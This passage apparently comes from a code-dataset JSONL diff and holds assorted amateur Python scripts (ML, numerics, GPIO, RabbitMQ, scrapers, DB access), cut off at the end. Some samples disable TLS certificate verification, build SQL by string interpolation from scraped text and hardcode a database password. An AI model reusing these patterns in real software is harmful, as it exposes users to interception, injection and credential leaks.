diff --git "a/4253.jsonl" "b/4253.jsonl" new file mode 100644--- /dev/null +++ "b/4253.jsonl" @@ -0,0 +1,621 @@ +{"seq_id":"193655161","text":"ctr = 0\nwhile(True):\n items = list(input())\n for i in range(len(items)):\n items[i] = items[i].upper()\n items = \"\".join(items).split(\" \")\n if(items[0] == \"EOI\"):\n break\n for i in range(len(items)):\n if(items[i] == \"NEMO\" or items[i] == \"NEMO,\"):\n ctr += 1\n if(ctr > 0):\n print(\"Found\")\n else:\n print(\"Missing\")\n ctr = 0 ","sub_path":"OneDrive/바탕 화면/알고리즘/10000~11000/10173.py","file_name":"10173.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"226549119","text":"#!/usr/bin/pyton\n# -*- coding: utf8 -*-\n\nx = 4\ndef var_scope_ex1():\n x = 5 # local variable shadow\n print(\"Local x :{0}\".format(x))\nvar_scope_ex1()\nprint(\"x : {0}\".format(x))\n\nz = 1\ndef var_scope_ex2():\n # not local variable z or y exist search global\n print(\"Local z not exit serch out scop z :{0}\".format(z))\n print(\"Local z not exit serch out scop y :{0}\".format(y))\ny = 2\nvar_scope_ex2()\n\n\ndef var_scope_ex3():\n print(w) # w not exist execute failed\n \nvar_scope_ex3()","sub_path":"opencv/2_var_scope_issue.py","file_name":"2_var_scope_issue.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"134082467","text":"import matplotlib.pyplot as plt\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nimport pandas as pd\n\nclass CNN:\n def __init__(self):\n np.random.seed(10)\n (self.x_Train, self.y_Train), (self.x_Test, self.y_Test) = mnist.load_data()\n #print('train data = ', len(x_train_image))\n #print('test data = ', len(x_test_image))\n self.model = Sequential()\n \n def run(self):\n # plot_images_labels_prediction(x_test_image, y_test_label, [], 0, 10)\n # print('x_train_image: ', x_train_image.shape)\n # print('y_train_label: ', y_train_label.shape)\n x_Train4D = self.x_Train.reshape(self.x_Train.shape[0], 28, 28, 1).astype('float32')\n x_Test4D = self.x_Test.reshape(self.x_Test.shape[0], 28, 28, 1).astype('float32')\n # print('x_train: ', x_Train.shape)\n # print('x_test: ', x_Test.shape)\n # print(x_train_image[0])\n x_Train4D_normalize = x_Train4D / 255\n x_Test4D_normalize = x_Test4D / 255\n # print( y_train_label[:5] )\n y_TrainOneHot = np_utils.to_categorical(self.y_Train)\n y_TestOneHot = np_utils.to_categorical(self.y_Test)\n # print(y_Train_OneHot[:5])\n # plot_image(x_train_image[0])\n # print(y_train_label[0])\n self.model.add(Conv2D(\n filters = 16,\n kernel_size = (5,5),\n padding = 'same',\n input_shape = (28,28,1),\n activation = 'relu'\n ))\n self.model.add(MaxPooling2D(pool_size=(2,2)))\n self.model.add(Conv2D(\n filters = 36,\n kernel_size = (5,5),\n padding = 'same',\n activation = 'relu'\n ))\n self.model.add(MaxPooling2D(pool_size=(2,2)))\n self.model.add(Dropout(0.25))\n self.model.add(Flatten())\n self.model.add(Dense(128, activation='relu'))\n self.model.add(Dropout(0.5))\n self.model.add(Dense(10, activation='softmax'))\n print(self.model.summary())\n self.model.compile(\n loss = 'categorical_crossentropy',\n optimizer = 'adam',\n metrics = ['accuracy'])\n train_history = self.model.fit(\n x = x_Train4D_normalize,\n y = y_TrainOneHot,\n validation_split = 0.2,\n epochs = 10,\n batch_size = 2300,\n verbose = 2)\n self.show_train_history(train_history, 'acc', 'val_acc')\n # show_train_history(train_history, 'loss', 'val_loss')\n scores = self.model.evaluate(x_Test4D_normalize, y_TestOneHot)\n print()\n print('accuracy = ', scores[1])\n prediction = self.model.predict_classes(x_Test4D_normalize)\n print()\n print()\n self.plot_images_labels_prediction(self.x_Test, self.y_Test, prediction, idx = 340)\n mtx = pd.crosstab(self.y_Test, \n prediction,\n colnames = ['predict'],\n rownames = ['label'])\n print(mtx)\n print()\n df = pd.DataFrame({'label': self.y_Test, 'predict': prediction})\n print( df[:2] )\n\n def plot_image(self, image):\n fig = plt.gcf()\n fig.set_size_inches(2,2)\n plt.imshow(image, cmap='binary')\n plt.show()\n\n def plot_images_labels_prediction(self, images, labels, prediction, idx, num=10):\n fig = plt.gcf()\n fig.set_size_inches(12,14)\n if num > 25: num=25\n for i in range(0,num):\n ax = plt.subplot(5, 5, 1+i)\n ax.imshow(images[idx], cmap='binary')\n \n title = 'lable=' + str(labels[idx])\n if len(prediction) > 0:\n title += ',predict=' + str(prediction[idx])\n \n ax.set_title(title, fontsize=10)\n ax.set_xticks([])\n ax.set_yticks([])\n idx += 1\n plt.show()\n\n def show_train_history(self, train_history, train, validation):\n plt.plot(train_history.history[train])\n plt.plot(train_history.history[validation])\n plt.title('Train History')\n plt.ylabel(train)\n plt.xlabel('epoch')\n plt.legend(['train', 'validation'], loc = 'upper left')\n plt.show()","sub_path":"models/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"581016571","text":"import viz, random\n\nviz.go()\n\n\nmale=viz.add('male.cfg')\nmale.translate(0,0,0.5)\nmale.rotate(0,1,0,180)\nface = male.face('leland_head.vzf')\n#face.setMorph(0,1)\n#face.setMorph(0,0)\n\nviz.MainWindow.clearcolor(viz.WHITE,0,0)","sub_path":"assets/avatars/Old Leland/leland test.py","file_name":"leland test.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"379488308","text":"def rk4( f, x0, t ):\r\n n = len( t )\r\n x = np.array( [ x0 ] * n )\r\n for i in xrange( n -1 ): \r\n h = t[i+1] - t[i]\r\n k1 = h*f( t[i], x[i]) \r\n k2 = h*f( t[i] + 0.5*h, x[i] + 0.5*k1)\r\n k3 = h*f( t[i] + 0.5*h, x[i] + 0.5 * k2)\r\n k4 = h*f( t[i] + h, x[i] + k3)\r\n x[i+1] = x[i] + (1./6.)*k1 + (1./3.)*k2 + (1./3.)*k3 + (1./6.)*k4\r\n\r\n return x\r\n\r\n\r\nimport numpy as np\r\n \r\ndef f(t, x):\r\n return 1./(2*(x-1))\r\n \r\nx0 = 1 + np.sqrt(0.001)\r\nt = np.linspace(0,4,12289)\r\nx_rk4 = rk4(f, x0, t)\r\n\r\ndef ForwardEuler(f, x0, t):\r\n n = len( t )\r\n x = np.array( [ x0 ] * n )\r\n for i in xrange( n -1 ):\r\n h = t[i+1] - t[i]\r\n x[i+1] = x[i] + h*f(t[i],x[i])\r\n \r\n return x\r\n\r\ndef f(t, x):\r\n return 1./(2*(x-1))\r\n\r\nx0 = 1 + np.sqrt(0.001)\r\nt = np.linspace(0,4,12289)\r\nx_ForwardEuler = ForwardEuler(f, x0, t)\r\ndef f(t):\r\n return 1 + np.sqrt(t + 0.001)\r\ny = f(t) \r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nplt.plot(t,x_rk4, 'r-')\r\nplt.hold('on')\r\nplt.plot(t,x_ForwardEuler,'b-')\r\nplt.hold('on')\r\nplt.plot(t, y, 'k-') \r\nplt.legend(['4rth order Runge-Kutta method','Forward Euler scheme','y(x)'])\r\nplt.xlabel('x')\r\nplt.ylabel('y(x)')\r\nplt.title('Comparing ODE Methods')\r\nplt.savefig('tmp4.pdf')\r\nplt.show()\r\n\r\n","sub_path":"innlevering/xy_ODE_FE_vs_RK4.py","file_name":"xy_ODE_FE_vs_RK4.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"270031738","text":"#!/usr/bin/env python3\n\n# Documentation: https://sourceforge.net/p/raspberry-gpio-python/wiki/Inputs/\n\n\n\"\"\"\nfacendo diversi esperimenti non mi sto trovando affatto bene con la parte del modulo GPIO\nche aggancia le callback ai pulsanti.\nnonostante io stia usando i pullup interni e anche un condensatore esterno da 100nF comunque, stressando \nmolto il pulsante (premendolo e rilasciandolo a ripetizione) ci sono conportamenti strani per cui non detecta \nalcuni fronti di salita o di discesa.\n\nIn un futuro esperimento mi proverò ad usare un sistema più rudimentale ma magari più efficacie che legga lo stato del bottone di continuo\ne tenga eventualmente traccia di un timer per fare un debouncing automatico.\nun po' come la corrispondente classe di Arduino\n\"\"\"\n\n\nimport threading, readchar, time, sys\nimport RPi.GPIO as GPIO\n\ngpios = [40, 38, 36]\nstatus = [False, False, False]\n\ndef myOnPressCallback(channel):\n\tif GPIO.input(channel) == GPIO.LOW:\n\t\tprint(\"channel {} low\".format(channel) )\n\telif GPIO.input(channel) == GPIO.HIGH:\n\t\tprint(\"channel {} high\".format(channel) )\n\t\n\n\ndef main():\n\tGPIO.setmode( GPIO.BOARD )\n\tfor channel in gpios:\n\t\tprint( channel )\n\t\tGPIO.setup(channel, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\t\tGPIO.add_event_detect(channel, GPIO.BOTH, callback=myOnPressCallback, bouncetime=200)\n\t\t#GPIO.add_event_detect(channel, GPIO.RISING, callback=myOnReleaseCallback, bouncetime=5000)\n\t\t\n\twhile True:\n\t\tprint(\"gianni\")\n\t\ttime.sleep(1)\n\t\t\n\tGPIO.cleanup()\n\t\t\n\t\"\"\"\t\n\tmyThread = threading.Thread( target=checkInput )\n\tmyThread.start()\n\twhile True:\n\t\tif sharedVar:\n\t\t\tprint(\"Trying to quit\")\n\t\t\tquit()\n\t\telse:\n\t\t\tprint( \"main thread\" )\n\t\t\ttime.sleep(1)\n\t\"\"\"\n\t\n\t\nif __name__ == \"__main__\":\n\tsys.exit( main() )\n","sub_path":"_wip/_old/GPIO_inputs/main_old.py","file_name":"main_old.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"427833044","text":"\"\"\"\nModule for sending and receiving messages from RabbitMQ.\n\"\"\"\nfrom kombu import Connection, Exchange, Queue\nfrom kombu.utils import json\n\nfrom eiffelactory import config\n\nCFG = config.Config().rabbitmq\n\n\nclass RabbitMQConnection:\n \"\"\"\n Class handling receiving and publishing message on the RabbitMQ messages bus\n \"\"\"\n def __init__(self, message_callback):\n self.message_callback = message_callback\n\n self.exchange = Exchange(CFG.exchange)\n self.connection = Connection(transport='amqp',\n hostname=CFG.host,\n port=CFG.port,\n userid=CFG.username,\n password=CFG.password,\n virtual_host=CFG.vhost,\n ssl=True)\n\n self.connection.connect()\n self.producer = self.connection.Producer(serializer='json',\n auto_declare=True)\n self.queue = Queue(channel=self.connection.channel(),\n name=CFG.queue,\n routing_key=CFG.routing_key)\n self.queue.declare()\n self.queue.bind_to(exchange=Exchange(CFG.exchange),\n routing_key=CFG.routing_key)\n self.consumer = self.connection.\\\n Consumer(\n queues=self.queue,\n callbacks=[self._handle_message],\n prefetch_count=\n CFG.prefetch_count)\n self.consuming = True\n\n def _handle_message(self, body, message):\n \"\"\"\n Callback called by consumer.\n :param body:\n :param message:\n :return:\n \"\"\"\n # body is sometimes dict and sometimes str\n # make sure it's a json dict before passing it on\n json_body = dict()\n if isinstance(body, dict):\n json_body = body\n elif isinstance(body, str):\n json_body = json.loads(body)\n\n self.message_callback(json_body)\n message.ack()\n\n def publish_message(self, message):\n \"\"\"\n Publishes passed message on the RabbitMQ message bus\n :param message:\n :return:\n \"\"\"\n self.producer.publish(message,\n retry=True,\n retry_policy={\n 'interval_start': 0,\n 'interval_step': 2,\n 'interval_max': 30,\n 'max_retries': 30,\n },\n exchange=self.exchange,\n routing_key=CFG.routing_key)\n\n def read_messages(self):\n \"\"\"\n Method reading messages from the queue in a while-true loop.\n Callback is defined in __init__\n :return:\n \"\"\"\n with self.consumer:\n while self.consuming:\n self.connection.drain_events()\n\n def close_connection(self):\n \"\"\"\n Closes the channels/connections.\n :return:\n \"\"\"\n # for now called when you press Ctrl-C\n self.consuming = False\n self.producer.release()\n self.connection.release()\n","sub_path":"eiffelactory/rabbitmq.py","file_name":"rabbitmq.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"66719664","text":"#!/usr/bin/env python3\n\nimport logging\nimport json\nimport urllib.request\nfrom socket import timeout\nimport mongo_db_helper\nimport ssl\nimport re\nimport requests\nfrom io import BytesIO\nfrom PIL import Image\nfrom pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nimport sys\nfrom urllib.error import HTTPError\nfrom urllib.error import URLError\nfrom http.client import IncompleteRead\n\n# -*- coding: utf-8 -*-\n\nlogging.basicConfig(filename='fetch_data.log',level=logging.DEBUG)\n\ndef fetch_top_data():\n topStoriesTopData=mongo_db_helper.db.topStories.find_one()\n return topStoriesTopData\n\ndef fetch_data(item):\n text=fetch_text(item)\n img=fetch_img(item)\n if text == None :\n savetoTroubles(item)\n return None\n if img == None :\n savetoTroubles(item)\n return None\n new_data={'text':text,'img':img}\n item.update(new_data)\n \n return item\n\ndef fetch_text(item):\n connection=getConnection(item)\n if connection == None :\n return None\n contentConnection,connectionEncoding=readContent(connection)\n if connectionEncoding == 'application/pdf':\n text=\"Click on the link to read the news story.\"\n else :\n try:\n content = contentConnection.decode('utf-8')\n except Exception as e:\n logging.error(\"decode text error:\", str(e))\n return None\n soup = BeautifulSoup(content, \"html.parser\")\n patternText=mongo_db_helper.patternText\n contentText = re.findall(patternText,content)\n text=\"\"\n if not contentText:\n text=\"Click on the link to read the news story.\"\n else :\n paragraph = soup.findAll('p')\n for i in range(len(paragraph)):\n text=text + paragraph[i].get_text()\n return text\n\ndef getUrlImage(siteUrl,urlImages):\n size = 0\n count = 0\n if urlImages == None:\n urlImages=\"images/notFound.png\"\n elif not urlImages:\n urlImages=\"images/notFound.png\"\n else :\n if urlImages[0]!='h':\n urlImages=siteUrl + urlImages \n try:\n response = requests.get(urlImages, timeout=10)\n img = Image.open(BytesIO(response.content))\n except (HTTPError, URLError) as error:\n logging.error('Data not retrieved because %s\\nURL: %s', error, siteUrl)\n return None\n except timeout:\n logging.error('image socket timed out - URL %s', siteUrl)\n return None \n except Exception as e:\n logging.error(e)\n return None\n count=count+1\n if img.width > size:\n size=img.width\n urls=urlImages\n return urls\n \ndef fetch_img(item):\n urlImage=[]\n if 'url' in item:\n siteUrl = item['url']\n else : \n siteUrl = 'https://news.ycombinator.com/item?id=' + str(item['id'])\n connection=getConnection(item)\n if connection == None :\n return None\n contentConnection,connectionEncoding=readContent(connection)\n if connectionEncoding == 'application/pdf':\n img=\"Click on the link to read the news story.\"\n else :\n try:\n content = contentConnection.decode('utf-8')\n except Exception as e:\n logging.error(e)\n return None\n soup = BeautifulSoup(content, \"html.parser\")\n patternImg=mongo_db_helper.patternImg\n contentImg = re.findall(patternImg,content)\n img=\"\"\n if not contentImg:\n img=\"images/notFound.png\"\n else :\n images = soup.findAll('img')\n for i in range(len(images)):\n if images[i].get('src') != None:\n urlImage.append(images[i].get('src'))\n for j in range(len(urlImage)):\n img = getUrlImage(siteUrl,urlImage[j])\n return img\n\ndef save_data():\n topStoriesTopData=fetch_top_data()\n topStoriesJsonData=fetch_data(topStoriesTopData)\n if topStoriesJsonData == None :\n return None\n mongo_db_helper.db.hackerNewsData.insert(topStoriesJsonData)\n mongo_db_helper.db.topStories.remove({'id':topStoriesJsonData['id']})\n\ndef save_data_all():\n if mongo_db_helper.db.topStories.count() == 0:\n print(\"Bitti\")\n else: \n save_data()\n save_data_all()\n\ndef getConnection(item):\n headers= mongo_db_helper.headers\n url = mongo_db_helper.url\n if 'url' in item:\n urlcontent=item['url']\n else:\n urlcontent='https://news.ycombinator.com/item?id=' + str(item['id'])\n request=url.Request(urlcontent,None,headers)\n context = ssl._create_unverified_context()\n try : \n connection = url.urlopen(request, timeout=10, context=context)\n except (HTTPError, URLError) as error:\n logging.error('Data not retrieved because %s\\nURL: %s', error, urlcontent)\n pass\n except timeout:\n logging.error('socket timed out - URL %s', urlcontent)\n pass\n except IncompleteRead:\n pass\n else :\n print('Access successful.')\n return connection\n\ndef readContent(connection):\n if connection == None :\n pass\n else :\n content = connection.read()\n http_message=connection.info()\n connection_encoding = http_message.get_content_type() \n return content,connection_encoding\n \ndef savetoTroubles(item) :\n mongo_db_helper.db.troubleMaker.insert(item)\n mongo_db_helper.db.topStories.remove({'id':item['id']})\n \nmongo_db_helper.mongoControl()\nsave_data_all()\n","sub_path":"fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":5453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"10519303","text":"import db_conn # db_conn.py 불러오기\nimport pymysql\nfrom time import time\nfrom datetime import datetime\n\n# 유저의 계측기 정보들을 가져옵니다.\ndef get_device_list():\n conn = db_conn.get_connection()\n sql ='select * from device inner join building_type on device.device_building_type = building_type.building_type where device_user_id=1'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql)\n rows = cursor.fetchall()\n conn.close()\n return rows\n\n# 유저의 계측기 정보들을 가져옵니다.\ndef get_data():\n conn = db_conn.get_connection()\n sql ='SELECT CAST(UNIX_TIMESTAMP(Create_time)/3600 AS SIGNED) ,FROM_UNIXTIME(CAST(UNIX_TIMESTAMP(Create_time)/3600 AS SIGNED)*3600) AS tDate ,COUNT(*) cnt, AVG(Longitude), AVG(Latitude), AVG(Height), device_id FROM rawdata_ulsan WHERE Create_time BETWEEN \"2021-04-29 15:15:00\" AND \"2021-04-30 23:59:59\" AND device_id=2214 GROUP BY 1'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql)\n rows = cursor.fetchall()\n conn.close()\n print(rows)\n return rows\n# 1.개별 계측기에 대한 기본정보\ndef all_device_info():\n conn = db_conn.get_connection()\n sql ='select device.device_location,user.user_phone_number,device.device_latitude,device.device_longitude,device.device_height from device inner join user on user.user_id= device.device_user_id '\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql)\n rows = cursor.fetchall()\n conn.close()\n return rows\n# 2.해당 건물에 위치한 또다른 계측기를 볼 수 있도록 \ndef each_device_building(login_user_id,building_name):\n conn = db_conn.get_connection()\n sql ='select distinct(device_id) from device LEFT JOIN building ON device.building_name=building.building_name where device.device_user_id=%s and device.building_name = %s'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n values = (login_user_id,building_name)\n cursor.execute(sql,values)\n infos = cursor.fetchall()\n conn.close()\n return infos\n\n\ndef each_device_info(device_id):\n conn = db_conn.get_connection()\n sql ='select device.device_criteria_latitude, device.device_criteria_height, device.device_criteria_longitude, device.device_criteria_latitude_min, device.device_criteria_longitude_min, device.device_criteria_height_min, device.device_location,user.user_phone_number,device.device_latitude,device.device_longitude,device.device_height from device inner join user on user.user_id= device.device_user_id where device.device_id=%s'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql,device_id)\n rows = cursor.fetchall()\n conn.close()\n return rows\n\n# 모든 사용자의 총 계측기 개수\ndef get_all_device():\n conn = db_conn.get_connection()\n sql ='select count(distinct(device_id)) from device'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql)\n counts = cursor.fetchall()\n conn.close()\n return counts\n# 로그인 후 나의 계측기 개수// 예외처리필요??\ndef get_my_device(login_user_id):\n conn = db_conn.get_connection()\n sql ='select count(distinct(device_id)) from device INNER JOIN user ON device_user_id = %s'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql,login_user_id)\n counts = cursor.fetchall()\n conn.close()\n return counts\n\n# 계측기 등록하기 (/register) // 구조물이름, 구조물종류,구조물 주소, 계측기 번호(device_id), 계측기 위치\ndef index_find_device():\n conn = db_conn.get_connection()\n sql_select = 'select MAX(id) from device'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql_select)\n id_idx = cursor.fetchone()\n conn.close()\n return id_idx\ndef index_find_building():\n conn = db_conn.get_connection()\n sql_select = 'select MAX(id) from building'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql_select)\n id_idx = cursor.fetchone()\n conn.close()\n return id_idx\n\ndef register_my_device(login_user_id,b_name,b_type,b_addr,d_id,d_name,d_loc):\n lat,long,height = d_loc.split('/')\n t_date = datetime.today().date()\n print(t_date)\n conn = db_conn.get_connection()\n max_id = index_find_device()['MAX(id)'] +1\n sql_insert ='insert into device values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'\n values = (max_id,d_id,d_name,login_user_id,t_date,pymysql.NULL,100,100,100,b_type,b_addr,b_name,float(lat),float(long),float(height),0,0,0,'정상')\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql_insert,values)\n conn.commit()\n conn.close()\n\ndef register_device_to_building(login_user_id,b_name,b_type,b_addr):\n conn = db_conn.get_connection()\n max_id = index_find_building()['MAX(id)'] +1\n sql_find = 'select building_type_name from building_type where building_type = %s'\n cursor = conn.cursor(pymysql.cursors.DictCursor)\n cursor.execute(sql_find,b_type)\n b_type_name = cursor.fetchone()\n sql_insert ='insert into building values (%s,%s,%s,%s,%s,%s,%s)'\n values = (max_id,b_addr,b_type,b_type_name['building_type_name'],b_name,login_user_id,'정상')\n cursor.execute(sql_insert,values)\n conn.commit()\n conn.close()\n \n\n\n","sub_path":"flask_code/device_data_dao.py","file_name":"device_data_dao.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"38413509","text":"from re import split\nfrom sys import stderr\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport psycopg2\n\n\nconnection = psycopg2.connect(\n dbname = 'postgres',\n user = 'postgres',\n password = 'liazat123',\n host = 'localhost'\n)\ncursor = connection.cursor()\n\nitc_page = requests.get(\n url='https://www.itc.kg/'\n)\ndata = bs(itc_page.text, 'html.parser')\n\nsection = data.find('section', attrs={\"id\": \"service\"})\nall_col_md_4 = section.find_all('div', class_=\"col-md-4\")\n\n\nfor col in all_col_md_4:\n name = col.h2.get_text()\n\n definition = col.p.text.strip().split('\\n')\n\n if definition[-1] == 'Подробнее':\n definition.pop(-1)\n\n description = ' '.join([i.strip() for i in definition])\n\n # print(description)\n\n\n a = f'''INSERT INTO parser (name, text)\n VALUES (\\'{name}\\', \\'{description}\\');'''\n\n # cursor.execute(a)\n # connection.commit()\n \n\n\ncreate = '''CREATE TABLE parser(\n user_id SERIAL PRIMARY KEY,\n name VARCHAR(250) NOT NULL,\n text VARCHAR(250) NOT NULL\n);'''\n# cursor.execute(create)\n# cursor.connection.commit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"344312170","text":"# 三方包\nimport os\nimport sys\nimport json\nimport random\nimport subprocess\nimport numpy as np\nimport _pickle as cPickle # python3之后,cPickle包改名成了_pickle\nimport logging\nimport argparse\nimport torch\n\n# 本地包\nimport src.shared.eval_utils\nimport src.all_models.model_utils\nimport src.shared.classes as classes\n\nprint(os.getcwd())\n# print(\"环境变量:\", os.environ[\"PATH\"], \"\\n\")\n\n'''\n# 把\"工作路径/src\"下的文件都加入搜索路径\nfor pack in os.listdir(\"src\"): # 遍历\"工作路径/src\"下的文件\n # 把每个文件加入到包的搜索路径\n sys.path.append(os.path.join(\"src\", pack))\n'''\n# 把项目根路径添加到模块搜索路径中\nprojectRootPath = os.path.abspath(os.path.join(__file__, \"..\", \"..\"))\nsys.path.append(projectRootPath)\n\n'''\n因为现有数据在序列化的时候是用的classes.Topic等名字,而现在是src.shared.classes.Topic等\n名字,不能对应,你反序列化之后识别不了。所以权宜之计是先按原来的方法import一遍\n'''\nsys.path.append(os.path.abspath(os.path.join(projectRootPath, \"shared\")))\nfrom src.shared.classes import *\n\n# 配置参数:命令行参数解器\nparser = argparse.ArgumentParser(description='Testing the regressors')\nparser.add_argument('--config_path', type=str, help=' The path configuration json file')\nparser.add_argument('--out_dir', type=str, help=' The directory to the output folder')\n# 进行参数解析,结果存入配置参数列表\nargs = parser.parse_args()\n\n# 根据out_dir参数,创建输出路径(如果不存在)\nif not os.path.exists(args.out_dir):\n os.makedirs(args.out_dir)\n\n# 根据config_path参数,读取配置文件(test_config.json)\nwith open(args.config_path, 'r') as js_file:\n config_dict = json.load(js_file)\n print(config_dict)\n\n# 把当前配置文件序列化为json保存在输出路径(test_config.json)\nwith open(os.path.join(args.out_dir,'test_config.json'), \"w\") as js_file:\n json.dump(config_dict, js_file, indent=4, sort_keys=True)\n\n# 配置参数:是否使用cuda\nif config_dict[\"gpu_num\"] != -1: # gpu_num为-1表示不想使用cuda\n # 新增环境变量\n os.environ[\"CUDA_VISIBLE_DEVICES\"]= str(config_dict[\"gpu_num\"])\n # 新增配置参数\n use_cuda = True\nelse: # gpu_num为其他表示想使用cuda\n use_cuda = False\n# 只有当配置文件中要求使用cuda,且cuda确实可用时,才使用cuda\nuse_cuda = use_cuda and torch.cuda.is_available()\nif use_cuda:\n print('使用cuda,cuda版本:')\n os.system(\"nvcc --version\")\nelse:\n print(\"不使用cuda\")\n\n# 配置random\nrandom.seed(config_dict[\"random_seed\"])\n\n# 配置numpy\nnp.random.seed(config_dict[\"random_seed\"])\n\n# 配置pytorch\ntorch.manual_seed(config_dict[\"seed\"])\nif use_cuda:\n torch.cuda.manual_seed(config_dict[\"seed\"])\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n# 配置logger\nlogging.basicConfig(\n # 使用fileHandler,日志文件在输出路径中(test_log.txt)\n filename=os.path.join(args.out_dir, \"test_log.txt\"),\n filemode=\"w\",\n # 配置日志级别\n level=logging.INFO\n)\n\n\ndef read_conll_f1(filename):\n '''\n This function reads the results of the CoNLL scorer , extracts the F1 measures of the MUS,\n B-cubed and the CEAF-e and calculates CoNLL F1 score.\n :param filename: a file stores the scorer's results.\n :return: the CoNLL F1\n '''\n f1_list = []\n with open(filename, \"r\") as ins:\n for line in ins:\n new_line = line.strip()\n if new_line.find('F1:') != -1:\n f1_list.append(float(new_line.split(': ')[-1][:-1]))\n\n muc_f1 = f1_list[1]\n bcued_f1 = f1_list[3]\n ceafe_f1 = f1_list[7]\n\n return (muc_f1 + bcued_f1 + ceafe_f1)/float(3)\n\n\ndef run_conll_scorer():\n if config_dict[\"test_use_gold_mentions\"]:\n event_response_filename = os.path.join(args.out_dir, 'CD_test_event_mention_based.response_conll')\n entity_response_filename = os.path.join(args.out_dir, 'CD_test_entity_mention_based.response_conll')\n else:\n event_response_filename = os.path.join(args.out_dir, 'CD_test_event_span_based.response_conll')\n entity_response_filename = os.path.join(args.out_dir, 'CD_test_entity_span_based.response_conll')\n\n event_conll_file = os.path.join(args.out_dir,'event_scorer_cd_out.txt')\n entity_conll_file = os.path.join(args.out_dir,'entity_scorer_cd_out.txt')\n\n event_scorer_command = ('perl scorer/scorer.pl all {} {} none > {} \\n'.format\n (config_dict[\"event_gold_file_path\"], event_response_filename, event_conll_file))\n\n entity_scorer_command = ('perl scorer/scorer.pl all {} {} none > {} \\n'.format\n (config_dict[\"entity_gold_file_path\"], entity_response_filename, entity_conll_file))\n\n processes = []\n print('Run scorer command for cross-document event coreference')\n processes.append(subprocess.Popen(event_scorer_command, shell=True))\n\n print('Run scorer command for cross-document entity coreference')\n processes.append(subprocess.Popen(entity_scorer_command, shell=True))\n\n while processes:\n status = processes[0].poll()\n if status is not None:\n processes.pop(0)\n\n print ('Running scorers has been done.')\n print ('Save results...')\n\n scores_file = open(os.path.join(args.out_dir, 'conll_f1_scores.txt'), 'w')\n\n event_f1 = read_conll_f1(event_conll_file)\n entity_f1 = read_conll_f1(entity_conll_file)\n scores_file.write('Event CoNLL F1: {}\\n'.format(event_f1))\n scores_file.write('Entity CoNLL F1: {}\\n'.format(entity_f1))\n\n scores_file.close()\n\n\ndef test_model(test_set: src.shared.classes.Corpus):\n r\"\"\"\n Loads trained event and entity models and test them on the test set\n\n :param test_set: 测试数据\n \"\"\"\n # 加载设备\n if use_cuda:\n cudan = \"cuda:\"+str(config_dict[\"gpu_num\"])\n device = torch.device(cudan)\n else:\n device = torch.device(\"cpu\")\n # 加载模型\n if use_cuda: # 训练模型时使用的是0号GPU,现在使用n号GPU,需要转换\n cd_event_model = torch.load(config_dict[\"cd_event_model_path\"], map_location={'cuda:0': cudan})\n cd_entity_model = torch.load(config_dict[\"cd_entity_model_path\"], map_location={'cuda:0': cudan})\n else: # 训练模型时使用的是0号GPU,现在使用CPU,需要转换\n cd_event_model = torch.load(config_dict[\"cd_event_model_path\"], map_location={'cuda:0': 'cpu'})\n cd_entity_model = torch.load(config_dict[\"cd_entity_model_path\"], map_location={'cuda:0': 'cpu'})\n # 把模型放到设备中\n cd_event_model.to(device)\n cd_entity_model.to(device)\n\n # 加载外部wd ec结果\n doc_to_entity_mentions = src.all_models.model_utils.load_entity_wd_clusters(config_dict)\n\n # 算法主体(数据,模型)\n _,_ = src.all_models.model_utils.test_models(test_set, cd_event_model, cd_entity_model,\n device, config_dict, write_clusters=True,\n out_dir=args.out_dir,\n doc_to_entity_mentions=doc_to_entity_mentions,\n analyze_scores=True)\n\n run_conll_scorer()\n\n\ndef main():\n \"\"\"\n This script loads the trained event and entity models and test them on the test set\n \"\"\"\n\n # 